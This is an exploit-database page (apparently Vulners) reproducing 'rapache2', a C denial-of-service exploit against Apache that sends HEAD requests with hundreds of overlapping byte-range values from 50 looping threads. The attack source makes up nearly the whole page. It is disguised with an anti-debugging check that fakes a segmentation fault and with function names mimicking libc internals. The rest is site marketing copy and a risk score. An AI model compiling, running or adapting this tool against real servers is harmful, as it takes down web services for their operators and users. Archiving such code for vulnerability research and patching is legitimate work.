Vulners
Lucene search
Remote Apache Denial of Service Exploit
/**
rapache2
"this is another version of rapache"
by: ev1lut10n
bug found by : Nikolaus Rango (Kingcope)
http://www.jasaplus.com/ev1lut10n
gopher://sdf.org/1/users/ev1lut10
Thanks: x-hack, danzel,p4, Ramon de C Valle and all my friends
compile: gcc -o rapache2 rapache2.c -pthread -Wall
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <pthread.h>
#define START_RANGE "HEAD / HTTP/1.1\nHost:localhost\nRange:bytes=0-"
#define USE_KEEP_ALIVE "\nAccept-Encoding: gzip\nKeep-Alive: 115\nConnection: keep-alive\n"
void _do_global_dtors_aux(void) __attribute__ ((constructor));
void _do_global_dtors_aux(void) {
if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
write(fileno(stdout), "Segmentation fault\n", 19);
exit(-1);
}
}
char *_libc_csu_fini(char total_range[16253])
{
int k=0;
char range[5]="";
char r2[16136]="";
while(k<1300)
{
char r[5]=",5-";
char ads[11]="";
sprintf(range,"%d",k);
strcat(ads,r);
strcat(ads,range);
strcat(r2,ads);
k++;
}
strcat(total_range,START_RANGE);
strcat(total_range,r2);
strcat(total_range,USE_KEEP_ALIVE);
return total_range;
}
void banner()
{
fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\n", 53, 1, stdout);
}
void gime_er_mas()
{
printf("%c%s", 0x1b, "[2J");
printf("%c%s", 0x1b, "[1;1H");
printf("\n[-] Usage : ./rapache2 hostname port_number\n");
printf("\n[-] Usage : ./rapache2 localhost 80\n");
}
struct thread_info {
pthread_t thread_id;
int thread_num;
char *variabel1;
char *variabel2;
char *variabel3;
};
void *_libc_csu_init(void *arg)
{
struct thread_info *tinfo = (struct thread_info *) arg;
char hostname[64];
char p1[4];
int j;
char rr[16253];
sprintf(rr,"%s",_libc_csu_fini(rr));
strcpy(hostname, tinfo->variabel1);
strcpy(p1, tinfo->variabel2);
j = 0;
while (j != 10) {
struct addrinfo hints;
struct addrinfo *result, *rp;
int sfd, s;
ssize_t nwritten;
memset(&hints, 0, sizeof(struct addrinfo));
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = 0;
hints.ai_protocol = 0;
s = getaddrinfo(hostname, p1, &hints, &result);
if (s != 0) {
continue;
}
for (rp = result; rp != NULL; rp = rp->ai_next) {
sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
if (sfd == -1)
continue;
if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1)
close(sfd);
}
if (result != NULL)
freeaddrinfo(result);
nwritten = write(sfd,rr, 16255);
printf("\n%s\n",rr);
if (nwritten == -1)
close(sfd);
usleep(300000);
j++;
}
return 0;
}
int main(int argc, char *argv[])
{
int i;
struct thread_info tinfo;
banner();
if (argc <= 1) {
gime_er_mas();
return 0;
}
printf("[+] Attacking %s please wait in minutes ...\n", argv[1]);
while (1) {
i = 0;
while (i != 50) {
tinfo.thread_num = i;
tinfo.variabel1 = argv[1];
tinfo.variabel2 = argv[2];
pthread_create(&tinfo.thread_id, NULL, &_libc_csu_init, &tinfo);
usleep(500000);
i++;
}
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Dec 2011 00:00Current
7.1High risk
Vulners AI Score7.1